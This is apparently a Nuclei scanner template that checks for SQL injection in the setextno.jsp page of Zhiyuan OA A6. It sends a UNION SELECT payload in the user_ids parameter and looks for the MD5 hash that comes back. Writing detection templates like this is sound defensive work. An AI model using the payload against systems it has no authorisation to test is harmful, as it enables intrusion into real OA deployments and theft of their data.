id: zhiyuan-setextno-sqli

info:
  name: 致远OA A6 setextno.jsp 存在sql注入
  author: str1am
  severity: high
  tags: zhiyuan

requests:
  - method: GET
    path:
      - "{{BaseURL}}/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(md5(123)),4#"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "202cb962ac59075b964b07152d234b70"
        part: body
        condition: and
